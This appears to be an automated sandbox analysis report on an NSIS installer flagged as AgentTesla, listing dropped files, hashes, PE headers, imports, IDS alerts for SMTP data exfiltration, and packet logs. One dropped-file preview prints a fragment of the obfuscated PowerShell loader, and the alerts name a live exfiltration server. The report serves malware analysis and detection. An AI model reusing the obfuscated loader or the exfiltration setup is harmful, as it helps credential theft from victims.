SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0nvwidb.zne.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfzodzfq.jr2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbro5521.szu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjxb2rpt.01z.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsk335D.tmp

Download File

Process:	C:\Users\user\Desktop\ulf4JrCRk2.exe
File Type:	data
Category:	dropped
Size (bytes):	1364950
Entropy (8bit):	4.01596624783414
Encrypted:	false
SSDEEP:	12288:RUXf2bA7Qhduz3IlubXO2cabU5YpEhLR659UbGM:kUhUz3fO2yl89Ubn
MD5:	B15E100E9C866F683BF95DB114620042
SHA1:	FF1A4A98FB030DE62A0F1AAD24C6F534E76AC892
SHA-256:	144180F59D06AC3935519D7159AB9ACFE85D7F6C9A70F0CA58B5132A32DFF8A7
SHA-512:	BE25270D5C093F9FDEEB03C1D0DB3449536D409C719A7A3B7A2CEA4EC9C4F0A3E1658509127C1F75D8EEADF9C9C1996D3E5607AAB85AC4977E9CA3E822AFA089
Malicious:	false
Preview:	\.......,.......................................\...........................................................................................................................................................................................................................................J...Z...............j..............................................................................................................................................."...0...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr

Download File

Process:	C:\Users\user\Desktop\ulf4JrCRk2.exe
File Type:	ASCII text, with very long lines (4071), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	74361
Entropy (8bit):	5.139691996852477
Encrypted:	false
SSDEEP:	1536:3RoLfsJqYSdQi9UVJ317waflwDB6ABq6Ic:3RoQJSQi9UVp17xaBXAA
MD5:	0C815073424B00B92FC425368C6F7131
SHA1:	3D1D9EBF91B36AF214735949192D6155005D17F1
SHA-256:	9680749A477B196DBC127709BCF3C0BC2BA2CD2EF3B1D81F3BADC0E2FD1FBCDF
SHA-512:	009D9D4574039AE8A5852E0D2EED1844D106274508C0365E04D22394507ADBF1CCBCA6D5FBD30740BCD9125397BC57F2D643F512F8D0D5F85FE1A673791A2D3A
Malicious:	false
Preview:	$Gruedes=$Specificize;..<#Supersubtilized Klumperne Animistiske Necessities Natt uniniquitousness Vaarbebudere #>..<#Supranaturalistic Tesvino postulatet Salmedigtningerne Nonlabeling #>..<#Duckiest Udskaenkedes Fatalismen Eyeholes Tandplejerne Dehiscing #>..<#Rygraden Outpromise Patriarkatet Superclean #>..<#Isotropies Rederier Gryden Romanbladsstilens Ddshjlpens Oversets Moonlit #>..<#thirsters Spejldren Sygdomsramte Mrkvrdigstes Berringspunkterne #>...$Prestandardization = @'.Kreditf.Jabarit$Crossb fEr cssorSolaries SmukketBogtroteFideikoh.ernbanaFindyrkaVisceronfiscalsdGallo hs DecumbfHeath,ookonge.mrDarwinikHave,aalCheeryfaForeprorF selstiInd ildn ,melteg Onestesafgifts=Offende$MohammeNColpopleArtworktgalva.ovErhvervrReseg.ekPasquins GaleeulAdultersAzogalln NewtoniT stausermercingMaalspreafhndelrSpge se; Aftesd.PardonnfNaillesu.rebogsnFetidsvcSuperthtAfkommei RiverloTurbiteninterna loshedYPeg suseunbooklai,dfross DestiltAnthropy Genu.s Blokb (Steiner$ShrievaPOutwoessAmplitue Def

C:\Users\user\AppData\Roaming\supersystem\panelet\Sgekoder.Vac

Download File

Process:	C:\Users\user\Desktop\ulf4JrCRk2.exe
File Type:	data
Category:	dropped
Size (bytes):	395975
Entropy (8bit):	7.668649303851621
Encrypted:	false
SSDEEP:	12288:0UXf2bA7Qhduz3IlubXO2cabU5YpEhLR6C:hUhUz3fO2ylT
MD5:	9932684265774F8D8F1E0EDE73C93A94
SHA1:	40C42BB51ADB70F3225EC91AA66C954CF6629607
SHA-256:	4D05D20984F566FA5E3741D3A0565E294D98416F78CFFC819FBA000D7259CBFC
SHA-512:	D889DD59CB51500BC17B9F81BA1BE5CAB98A9CE8A10E15A1CE374639B6F572738E1DF7360582E160A5A876BF5F301403CC7C937D639A1C7E7FB8DFC4BC65F2D3
Malicious:	false
Preview:	.......?.\|....dd.aa.#.................!!!....+................1........777........!!!..........?......RRR...........PP..........'.99............................ ....H....!!!!.......pp...=.4.].................(..Z.hhhhh..A..........N.........6.....B......k...s....f............W................................eeee.S.....H........w...N....DD...............L..//..JJJJ..........................8.............................LLL............G..xx.........................XXX..........7......>>>...$$$$.\\........Q.............rr.....AA......zzzzzz..m...............'...;.\.}..PPP..}._.............k..............X.................::.z...V..99...ss.........................8.PP............55........p.........................CC.....DDD.....................ff.fff.........t...O.........7..h.......```.wwwwwwwww....\|............eee.................]..xxxx.....T..@.....yyyyyyyy.............__.\.............G.....OOO............................;.......................p...GGG....................\\..G.n.....

C:\Users\user\AppData\Roaming\supersystem\panelet\catalog.txt

Download File

Process:	C:\Users\user\Desktop\ulf4JrCRk2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	401
Entropy (8bit):	4.3081571951748
Encrypted:	false
SSDEEP:	6:Qz1k+ipwZQRjLDgRuJO6LfZ+3eoaaXxZ4lDvxFJoAc4SKpr7l1zR8xWtn:g7SwZAgRuJ7LQ3eolsDvxvoAyCzRyWt
MD5:	3CCD7CE3AEADE62D54268376DE39516D
SHA1:	3A6C81F87F5DFFC16D6F83B80BACB7986F449A92
SHA-256:	923C9A43BB424B083E8C9F4AF6D7542DFD314DE4774CFA4A2C02078A8824F870
SHA-512:	641B40048461820C1B6708662EB89B3C814EB9D81C02407074439253B908F9B706A58F416103093D45181D3A1A79976ED2B317B8B107A16C83346693357B3717
Malicious:	false
Preview:	coverable overboernes rederiernes malta hash sigbrandt penaria..hypocaust vindjakker residensen faglig inspire fossulate.hospitalmen kalvis chunk enantiopathia lkapsler fremkalde yeo brumbasserne..udnvnelsers aandeverdens staidness lsningsmodel rumfartscentres sedimenteres skalaindkomst..wotted intracollegiate baccharoid markswomen fip,skrivelinje laputically luftfarts doublelunged vestal isthmist.

C:\Users\user\AppData\Roaming\supersystem\panelet\latrias.reg

Download File

Process:	C:\Users\user\Desktop\ulf4JrCRk2.exe
File Type:	data
Category:	dropped
Size (bytes):	489222
Entropy (8bit):	1.2506752052648178
Encrypted:	false
SSDEEP:	1536:KRRhfB9L9tO+zdfjXM6/cCVa5RrtfOvY0tl:O/9oQzM+vutfOQY
MD5:	4D738E5B430D2DA5F5440BFBA5E0C83C
SHA1:	3B73C8D8E4291DE2C588D56F6B0911D068B27363
SHA-256:	67733DF8EAC8617D961458E56C3D8D7265F26519D4E50AF7FA62C081363E50CE
SHA-512:	F14D6BC66B42591EDD5CAC6D80583C22F49484EDDE03CBC19616DE5E2F279479FD5D6CD0C8A76BAFB645178BD964A17E91EBCAA050F06818C1000FCE7712C8C0
Malicious:	false
Preview:	.....:...........................................8..........`.............Y...'............................................................................................8..................................................................................................K..........................................................P....................................................................................t.........r.............j...................................................................................................................................................................................m.............................................]......................d~...o.......R..............M................................................................._.......................................m................................................K...................................&.................V.......Q...............o....................................]........./....

C:\Users\user\AppData\Roaming\supersystem\panelet\puquinan.tod

Download File

Process:	C:\Users\user\Desktop\ulf4JrCRk2.exe
File Type:	data
Category:	dropped
Size (bytes):	397443
Entropy (8bit):	1.2507334034977688
Encrypted:	false
SSDEEP:	768:rutC7/xNChL15JkoO+lJmgozzros+eJn+GYSNODnOaFm3FU4lEQ08aWEwPCWDTLH:DKytNBgY6Q8JMdL4xiMp/7Cgvsww1I8
MD5:	52277EFB876A67F81E5C8478D30F0940
SHA1:	12B0B6D0DED14774C04AE561947C5F99F8046AF8
SHA-256:	3688D48D11BB36B7C25270DE4B4D3C04181121AFCAFFD52A9F9C3FE7B69A2D42
SHA-512:	356CD3B38AEC9B8AE7D831921A2BE60E80983F242D0E9DBBD60AE3CAB4A63DBFD35F12EC055975046070BABD71D847C0A2AD4578D02E845D0753BF7FF56C57E6
Malicious:	false
Preview:	..l........................I.............x...............X...................................9...............................................o....................'..................\........v..............................................................B...................................E.....................................e.......................................M.....v............r..(.........................................................................................,..)..............................#...T.................................M..................................+v...E..............?...............?..............d...................................U.............`.............*..........................................o.....s...........................................................................................................7..y......a........................................................................a.......................................................X.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.674157022598364
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ulf4JrCRk2.exe
File size:	748'528 bytes
MD5:	a8a9f68888009bf9737238846f3b6ec3
SHA1:	328fc40462eca7d498bfe67b17a01a1ff009796b
SHA256:	26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c
SHA512:	a77cd1aa5d16e0747afdbd5a7d256520076d9e8a18927c367254f8de85490872e1d97307f93b407f04893f5414534f691394b1ba45ae3d6c36fb8eda3d4aebb8
SSDEEP:	12288:8KzIabEV5n4lymBGY1FXYxV6eIrWgVHlDL/eM0fyQCx:8KzIcEc7Bt1gV6FVwYx
TLSH:	D3F4F192F2C169DBC48256B985B9D730007F9F80662D066E3649793D9FB23006AC7FDB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@

File Icon


Icon Hash:	7d4d4dd45f59ec13

Static PE Info

General

Entrypoint:	0x403217
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x54336EB1 [Tue Oct 7 04:40:17 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	59a4a44a250c4cf4f2d9de2b3fe5d95f

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Aldres Paakendelsens ", E=rdbedens@Foreller.Su, L=Pipriac, S=Bretagne, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	24/05/2024 04:56:26 24/05/2027 04:56:26
Subject Chain	CN="Aldres Paakendelsens ", E=rdbedens@Foreller.Su, L=Pipriac, S=Bretagne, C=FR
Version:	3
Thumbprint MD5:	44496AA563AC7865B0BE61FFDAFACCF3
Thumbprint SHA-1:	49D174754FBD230609EE4A19CA5DA566C6025CE4
Thumbprint SHA-256:	7DE023652651A9A01E3B7F3406EAB3DA91DD2EBDAF886F1FEF0A41AF6EDE7577
Serial:	188FEAED300598C1C64FBA42DB3B7B0BA158602F

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040728Ch]
push 00000009h
mov dword ptr [004237B8h], eax
call 00007FAE707CC6B5h
mov dword ptr [00423704h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECB8h
call dword ptr [00407164h]
push 004091E4h
push 00422F00h
call 00007FAE707CC35Fh
call dword ptr [004070B0h]
mov ebp, 00429000h
push eax
push ebp
call 00007FAE707CC34Dh
push ebx
call dword ptr [00407118h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423700h], eax
mov eax, ebp
jne 00007FAE707C98FCh
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FAE707CBDDDh
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007FAE707C99B5h
cmp cl, 00000020h
jne 00007FAE707C98F8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FAE707C98ECh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x28500	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb6268	0x988
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5bf4	0x5c00	92032f5e50e74fe0fe80a33ba4ca92db	False	0.6700067934782609	data	6.478210757314278	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	5801d712ecba58aa87d1e7d1aa24f3aa	False	0.4522569444444444	OpenPGP Secret Key	5.236122428806677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7f8	0x400	f2470ac8847791744aff280e7e2f5353	False	0.615234375	data	5.025395707292401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x13000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0x28500	0x28600	8fe3eeefdb70a69775e0275630c876e7	False	0.33500024187306504	data	5.364335686193679	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x37358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.27695788477463623
RT_ICON	0x47b80	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.34693609417700233
RT_ICON	0x51028	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.38391866913123845
RT_ICON	0x564b0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3682687765706188
RT_ICON	0x5a6d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4352697095435685
RT_ICON	0x5cc80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4899155722326454
RT_ICON	0x5dd28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.601639344262295
RT_ICON	0x5e6b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6870567375886525
RT_DIALOG	0x5eb18	0x140	data	English	United States	0.46875
RT_DIALOG	0x5ec58	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5ed78	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5ee40	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5eea0	0x76	data	English	United States	0.7542372881355932
RT_VERSION	0x5ef18	0x2e0	data	English	United States	0.48777173913043476
RT_MANIFEST	0x5f1f8	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T16:09:44.203457+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.9	49933	208.91.199.223	587	TCP
2024-11-05T16:09:44.203457+0100	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.9	49933	208.91.199.223	587	TCP
2024-11-05T16:10:05.747802+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.9	49795	TCP
2024-11-05T16:10:30.808031+0100	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.9	49933	208.91.199.223	587	TCP
2024-11-05T16:10:30.808031+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.9	49933	208.91.199.223	587	TCP
2024-11-05T16:10:43.237145+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.9	49977	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 16:10:20.382661104 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:20.382707119 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:20.382778883 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:20.397202969 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:20.397213936 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.265965939 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.266052008 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.266665936 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.266720057 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.349963903 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.349981070 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.350270033 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.350331068 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.353750944 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.399327993 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.721776009 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.721838951 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.721848011 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.722063065 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.722234011 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.722265005 CET	443	49879	216.58.206.46	192.168.2.9
Nov 5, 2024 16:10:21.722311974 CET	49879	443	192.168.2.9	216.58.206.46
Nov 5, 2024 16:10:21.745728970 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:21.745743036 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:21.745882988 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:21.746212006 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:21.746222019 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:22.614394903 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:22.614533901 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:22.618558884 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:22.618568897 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:22.618796110 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:22.622946978 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:22.623023033 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:22.667334080 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.100903988 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.101070881 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:25.110292912 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.110431910 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:25.216139078 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.216403961 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:25.216411114 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.216496944 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.216512918 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:25.216516972 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.216599941 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:25.233206034 CET	443	49889	142.250.185.193	192.168.2.9
Nov 5, 2024 16:10:25.233450890 CET	49889	443	192.168.2.9	142.250.185.193
Nov 5, 2024 16:10:25.233454943 CET	443	49889	142.250.185.193	192.168.2.9
